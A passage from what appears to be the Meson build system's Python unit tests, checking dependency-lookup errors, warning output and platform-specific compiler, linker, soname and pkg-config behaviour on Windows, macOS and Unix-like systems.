# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
def sanitycheck_vscrt(vscrt):
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for description of the case this test
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lz -lsimple1', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
